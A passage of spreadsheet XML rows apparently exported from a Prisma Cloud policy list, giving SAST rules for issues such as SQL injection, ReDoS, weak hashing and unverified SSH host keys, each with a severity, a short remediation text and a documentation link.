      <c r="C442" s="2" t="inlineStr"/>
      <c r="D442" t="inlineStr"/>
      <c r="E442" t="inlineStr"/>
      <c r="F442" t="inlineStr"/>
      <c r="G442" t="b">
        <v>1</v>
      </c>
      <c r="H4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2" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J442" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K442" t="inlineStr">
        <is>
          <t>AngularJS misconfiguration dangerous protocol allowed</t>
        </is>
      </c>
      <c r="L442" t="inlineStr"/>
      <c r="M442" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N442" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O442" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P442" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q442" t="inlineStr"/>
      <c r="R442" t="inlineStr"/>
      <c r="S442" t="inlineStr"/>
      <c r="T442" t="b">
        <v>0</v>
      </c>
      <c r="U442" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V442" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W442" t="inlineStr">
        <is>
          <t>Ensure the application does not allow JavaScript as an allowed protocol, which may lead to cross-site scripting vulnerabilities.</t>
        </is>
      </c>
      <c r="X442" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/javascript-policies/sast-policy-84</t>
        </is>
      </c>
      <c r="Y442" t="inlineStr"/>
      <c r="Z442" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA442" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB442" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC442" t="inlineStr">
        <is>
          <t>CKV3_SAST_84</t>
        </is>
      </c>
      <c r="AD442" t="b">
        <v>1</v>
      </c>
      <c r="AE442" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF442" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG4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2" t="inlineStr">
        <is>
          <t>72c666fd-b808-4ab1-b14c-8e097ec05b4b</t>
        </is>
      </c>
      <c r="AI442" t="inlineStr"/>
      <c r="AJ442" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK442" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="443">
      <c r="A443" t="inlineStr"/>
      <c r="B443" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C443" s="2" t="inlineStr"/>
      <c r="D443" t="inlineStr"/>
      <c r="E443" t="inlineStr"/>
      <c r="F443" t="inlineStr"/>
      <c r="G443" t="b">
        <v>1</v>
      </c>
      <c r="H4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3" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J443" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K443" t="inlineStr">
        <is>
          <t>Missing authentication for critical function (database)</t>
        </is>
      </c>
      <c r="L443" t="inlineStr"/>
      <c r="M443" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N443" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O443" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P443" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q443" t="inlineStr"/>
      <c r="R443" t="inlineStr"/>
      <c r="S443" t="inlineStr"/>
      <c r="T443" t="b">
        <v>0</v>
      </c>
      <c r="U443" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V443" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W443" t="inlineStr">
        <is>
          <t>The application does not provide authentication when communicating a database server. It is strongly recommended that the database server be configured with authentication and restrict what queries users can execute.</t>
        </is>
      </c>
      <c r="X443" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/java-policies/sast-policy-139</t>
        </is>
      </c>
      <c r="Y443" t="inlineStr"/>
      <c r="Z443" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA443" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB443" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC443" t="inlineStr">
        <is>
          <t>CKV3_SAST_139</t>
        </is>
      </c>
      <c r="AD443" t="b">
        <v>1</v>
      </c>
      <c r="AE443" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF443" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG4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3" t="inlineStr">
        <is>
          <t>0cafe32d-6f7f-473f-ae55-7a96c3464acd</t>
        </is>
      </c>
      <c r="AI443" t="inlineStr"/>
      <c r="AJ443" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK443" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="444">
      <c r="A444" t="inlineStr"/>
      <c r="B444" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C444" s="2" t="inlineStr"/>
      <c r="D444" t="inlineStr"/>
      <c r="E444" t="inlineStr"/>
      <c r="F444" t="inlineStr"/>
      <c r="G444" t="b">
        <v>1</v>
      </c>
      <c r="H4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4" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J444" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K444" t="inlineStr">
        <is>
          <t>Missing authentication for critical function (LDAP)</t>
        </is>
      </c>
      <c r="L444" t="inlineStr"/>
      <c r="M444" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N444" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O444" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P444" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q444" t="inlineStr"/>
      <c r="R444" t="inlineStr"/>
      <c r="S444" t="inlineStr"/>
      <c r="T444" t="b">
        <v>0</v>
      </c>
      <c r="U444" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V444" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W444" t="inlineStr">
        <is>
          <t>The application does not provide authentication when communicating an LDAP server. It is strongly recommended that the LDAP server be configured with authentication and restrict what queries users can execute.</t>
        </is>
      </c>
      <c r="X444" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/java-policies/sast-policy-140</t>
        </is>
      </c>
      <c r="Y444" t="inlineStr"/>
      <c r="Z444" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA444" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB444" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC444" t="inlineStr">
        <is>
          <t>CKV3_SAST_140</t>
        </is>
      </c>
      <c r="AD444" t="b">
        <v>1</v>
      </c>
      <c r="AE444" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF444" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG4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4" t="inlineStr">
        <is>
          <t>8264babb-33d3-4689-bbd1-830704c6d3bf</t>
        </is>
      </c>
      <c r="AI444" t="inlineStr"/>
      <c r="AJ444" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK444" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="445">
      <c r="A445" t="inlineStr"/>
      <c r="B445" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C445" s="2" t="inlineStr"/>
      <c r="D445" t="inlineStr"/>
      <c r="E445" t="inlineStr"/>
      <c r="F445" t="inlineStr"/>
      <c r="G445" t="b">
        <v>1</v>
      </c>
      <c r="H4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5" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J445" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K445" t="inlineStr">
        <is>
          <t>Detects instances of new Buffer()</t>
        </is>
      </c>
      <c r="L445" t="inlineStr"/>
      <c r="M445" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N445" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O445" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P445" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q445" t="inlineStr"/>
      <c r="R445" t="inlineStr"/>
      <c r="S445" t="inlineStr"/>
      <c r="T445" t="b">
        <v>0</v>
      </c>
      <c r="U445" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V445" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W445" t="inlineStr">
        <is>
          <t>Detects instances of new Buffer(argument) where argument is any non-literal value which could cause memory leak. Recommended usage is `Buffer.from()` or `Buffer.alloc()`.</t>
        </is>
      </c>
      <c r="X445" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/javascript-policies/sast-policy-42</t>
        </is>
      </c>
      <c r="Y445" t="inlineStr"/>
      <c r="Z445" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA445" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB445" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC445" t="inlineStr">
        <is>
          <t>CKV3_SAST_42</t>
        </is>
      </c>
      <c r="AD445" t="b">
        <v>1</v>
      </c>
      <c r="AE445" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF445" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG4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5" t="inlineStr">
        <is>
          <t>50b7ca31-8ad3-4bd5-b0d5-98ddebacf69d</t>
        </is>
      </c>
      <c r="AI445" t="inlineStr"/>
      <c r="AJ445" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK445" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="446">
      <c r="A446" t="inlineStr"/>
      <c r="B446" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C446" s="2" t="inlineStr"/>
      <c r="D446" t="inlineStr"/>
      <c r="E446" t="inlineStr"/>
      <c r="F446" t="inlineStr"/>
      <c r="G446" t="b">
        <v>1</v>
      </c>
      <c r="H4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6" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J446" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K446" t="inlineStr">
        <is>
          <t>Information exposure through an error message</t>
        </is>
      </c>
      <c r="L446" t="inlineStr"/>
      <c r="M446" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N446" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O446" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P446" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q446" t="inlineStr"/>
      <c r="R446" t="inlineStr"/>
      <c r="S446" t="inlineStr"/>
      <c r="T446" t="b">
        <v>0</v>
      </c>
      <c r="U446" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V446" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W446" t="inlineStr">
        <is>
          <t>Error messages with stack traces may expose sensitive information about the application.</t>
        </is>
      </c>
      <c r="X446" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/javascript-policies/sast-policy-160</t>
        </is>
      </c>
      <c r="Y446" t="inlineStr"/>
      <c r="Z446" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA446" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB446" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC446" t="inlineStr">
        <is>
          <t>CKV3_SAST_160</t>
        </is>
      </c>
      <c r="AD446" t="b">
        <v>1</v>
      </c>
      <c r="AE446" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF446" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG4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6" t="inlineStr">
        <is>
          <t>263b995b-c1b9-40eb-97a5-749be5b7859e</t>
        </is>
      </c>
      <c r="AI446" t="inlineStr"/>
      <c r="AJ446" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK446" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="447">
      <c r="A447" t="inlineStr"/>
      <c r="B447" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C447" s="2" t="inlineStr"/>
      <c r="D447" t="inlineStr"/>
      <c r="E447" t="inlineStr"/>
      <c r="F447" t="inlineStr"/>
      <c r="G447" t="b">
        <v>1</v>
      </c>
      <c r="H4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7" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J447" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K447" t="inlineStr">
        <is>
          <t>Regular expression with non-literal value</t>
        </is>
      </c>
      <c r="L447" t="inlineStr"/>
      <c r="M447" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N447" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O447" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P447" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q447" t="inlineStr"/>
      <c r="R447" t="inlineStr"/>
      <c r="S447" t="inlineStr"/>
      <c r="T447" t="b">
        <v>0</v>
      </c>
      <c r="U447" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V447" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W447" t="inlineStr">
        <is>
          <t>Calling the RegExp constructor with a non-literal variable can lead to Regex Denial of Service (ReDoS). To prevent this, avoid user-supplied regex and use hardcoded ones. Alternatively, consider the safe node-re2 engine, which doesn't support backtracking.</t>
        </is>
      </c>
      <c r="X447" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/javascript-policies/sast-policy-159</t>
        </is>
      </c>
      <c r="Y447" t="inlineStr"/>
      <c r="Z447" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA447" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB447" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC447" t="inlineStr">
        <is>
          <t>CKV3_SAST_159</t>
        </is>
      </c>
      <c r="AD447" t="b">
        <v>1</v>
      </c>
      <c r="AE447" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF447" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG4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7" t="inlineStr">
        <is>
          <t>4ce2c1ac-fefe-4288-a56b-bbd3f9504e50</t>
        </is>
      </c>
      <c r="AI447" t="inlineStr"/>
      <c r="AJ447" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK447" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="448">
      <c r="A448" t="inlineStr"/>
      <c r="B448" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C448" s="2" t="inlineStr"/>
      <c r="D448" t="inlineStr"/>
      <c r="E448" t="inlineStr"/>
      <c r="F448" t="inlineStr"/>
      <c r="G448" t="b">
        <v>1</v>
      </c>
      <c r="H4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8" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J448" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K448" t="inlineStr">
        <is>
          <t>Use of a broken or risky cryptographic algorithm (SHA1/MD5)</t>
        </is>
      </c>
      <c r="L448" t="inlineStr"/>
      <c r="M448" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N448" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O448" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P448" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q448" t="inlineStr"/>
      <c r="R448" t="inlineStr"/>
      <c r="S448" t="inlineStr"/>
      <c r="T448" t="b">
        <v>0</v>
      </c>
      <c r="U448" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V448" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W448" t="inlineStr">
        <is>
          <t>The application was found using an insecure or risky digest or signature algorithm. Both MD5 and SHA1 hash algorithms have been found to be vulnerable to producing collisions. This means that two different values, when hashed, can lead to the same hash value.</t>
        </is>
      </c>
      <c r="X448" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/java-policies/sast-policy-149</t>
        </is>
      </c>
      <c r="Y448" t="inlineStr"/>
      <c r="Z448" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA448" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB448" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC448" t="inlineStr">
        <is>
          <t>CKV3_SAST_149</t>
        </is>
      </c>
      <c r="AD448" t="b">
        <v>1</v>
      </c>
      <c r="AE448" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF448" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG4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8" t="inlineStr">
        <is>
          <t>7cf1e887-03d8-4c5a-bc8f-400c3b23be6c</t>
        </is>
      </c>
      <c r="AI448" t="inlineStr"/>
      <c r="AJ448" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK448" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="449">
      <c r="A449" t="inlineStr"/>
      <c r="B449" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C449" s="2" t="inlineStr"/>
      <c r="D449" t="inlineStr"/>
      <c r="E449" t="inlineStr"/>
      <c r="F449" t="inlineStr"/>
      <c r="G449" t="b">
        <v>1</v>
      </c>
      <c r="H4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49" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J449" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K449" t="inlineStr">
        <is>
          <t>Use of insecure HTTP connections</t>
        </is>
      </c>
      <c r="L449" t="inlineStr"/>
      <c r="M449" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N449" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O449" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P449" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q449" t="inlineStr"/>
      <c r="R449" t="inlineStr"/>
      <c r="S449" t="inlineStr"/>
      <c r="T449" t="b">
        <v>0</v>
      </c>
      <c r="U449" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V449" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W449" t="inlineStr">
        <is>
          <t>Ensure that HTTP connection is secure (HTTPS)</t>
        </is>
      </c>
      <c r="X449" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/javascript-policies/sast-policy-39</t>
        </is>
      </c>
      <c r="Y449" t="inlineStr"/>
      <c r="Z449" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA449" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB449" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC449" t="inlineStr">
        <is>
          <t>CKV3_SAST_39</t>
        </is>
      </c>
      <c r="AD449" t="b">
        <v>1</v>
      </c>
      <c r="AE449" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF449" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG4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49" t="inlineStr">
        <is>
          <t>71350378-4e61-42ec-b5d3-92a195e5a8b2</t>
        </is>
      </c>
      <c r="AI449" t="inlineStr"/>
      <c r="AJ449" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK449" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="450">
      <c r="A450" t="inlineStr"/>
      <c r="B450" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C450" s="2" t="inlineStr"/>
      <c r="D450" t="inlineStr"/>
      <c r="E450" t="inlineStr"/>
      <c r="F450" t="inlineStr"/>
      <c r="G450" t="b">
        <v>1</v>
      </c>
      <c r="H4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0" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J450" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K450" t="inlineStr">
        <is>
          <t>Key Exchange without Entity Authentication</t>
        </is>
      </c>
      <c r="L450" t="inlineStr"/>
      <c r="M450" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N450" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O450" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P450" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q450" t="inlineStr"/>
      <c r="R450" t="inlineStr"/>
      <c r="S450" t="inlineStr"/>
      <c r="T450" t="b">
        <v>0</v>
      </c>
      <c r="U450" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V450" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W450" t="inlineStr">
        <is>
          <t>Detected a paramiko host key policy that implicitly trusts a server's host key. Host keys should be verified to ensure the connection is not to a malicious server. Use RejectPolicy or a custom subclass instead.</t>
        </is>
      </c>
      <c r="X450" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/python-policies/sast-policy-98</t>
        </is>
      </c>
      <c r="Y450" t="inlineStr"/>
      <c r="Z450" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA450" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB450" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC450" t="inlineStr">
        <is>
          <t>CKV3_SAST_98</t>
        </is>
      </c>
      <c r="AD450" t="b">
        <v>1</v>
      </c>
      <c r="AE450" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF450" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG4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0" t="inlineStr">
        <is>
          <t>346ccdd3-1977-4185-94f3-26ffd3087577</t>
        </is>
      </c>
      <c r="AI450" t="inlineStr"/>
      <c r="AJ450" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK450" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="451">
      <c r="A451" t="inlineStr"/>
      <c r="B451" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C451" s="2" t="inlineStr"/>
      <c r="D451" t="inlineStr"/>
      <c r="E451" t="inlineStr"/>
      <c r="F451" t="inlineStr"/>
      <c r="G451" t="b">
        <v>1</v>
      </c>
      <c r="H4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1" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J451" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K451" t="inlineStr">
        <is>
          <t>Request exposed to SQL injection attack</t>
        </is>
      </c>
      <c r="L451" t="inlineStr"/>
      <c r="M451" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N451" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O451" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P451" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q451" t="inlineStr"/>
      <c r="R451" t="inlineStr"/>
      <c r="S451" t="inlineStr"/>
      <c r="T451" t="b">
        <v>0</v>
      </c>
      <c r="U451" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V451" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W451" t="inlineStr">
        <is>
          <t>Make sure to sanitize user input data</t>
        </is>
      </c>
      <c r="X451" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/golang-policies/sast-policy-202</t>
        </is>
      </c>
      <c r="Y451" t="inlineStr"/>
      <c r="Z451" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA451" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB451" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC451" t="inlineStr">
        <is>
          <t>CKV3_SAST_202</t>
        </is>
      </c>
      <c r="AD451" t="b">
        <v>1</v>
      </c>
      <c r="AE451" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF451" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG4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1" t="inlineStr">
        <is>
          <t>b6ad3d65-f153-47b6-a318-66db9e01d11e</t>
        </is>
      </c>
      <c r="AI451" t="inlineStr"/>
      <c r="AJ451" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK451" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="452">
      <c r="A452" t="inlineStr"/>
      <c r="B452" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C452" s="2" t="inlineStr"/>
      <c r="D452" t="inlineStr"/>
      <c r="E452" t="inlineStr"/>
      <c r="F452" t="inlineStr"/>
      <c r="G452" t="b">
        <v>1</v>
      </c>
      <c r="H4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2" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J452" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K452" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements used in a command</t>
        </is>
      </c>
      <c r="L452" t="inlineStr"/>
      <c r="M452" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N452" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O452" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P452" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q452" t="inlineStr"/>
      <c r="R452" t="inlineStr"/>
      <c r="S452" t="inlineStr"/>
      <c r="T452" t="b">
        <v>0</v>
      </c>
      <c r="U452" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V452" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W452" t="inlineStr">
        <is>
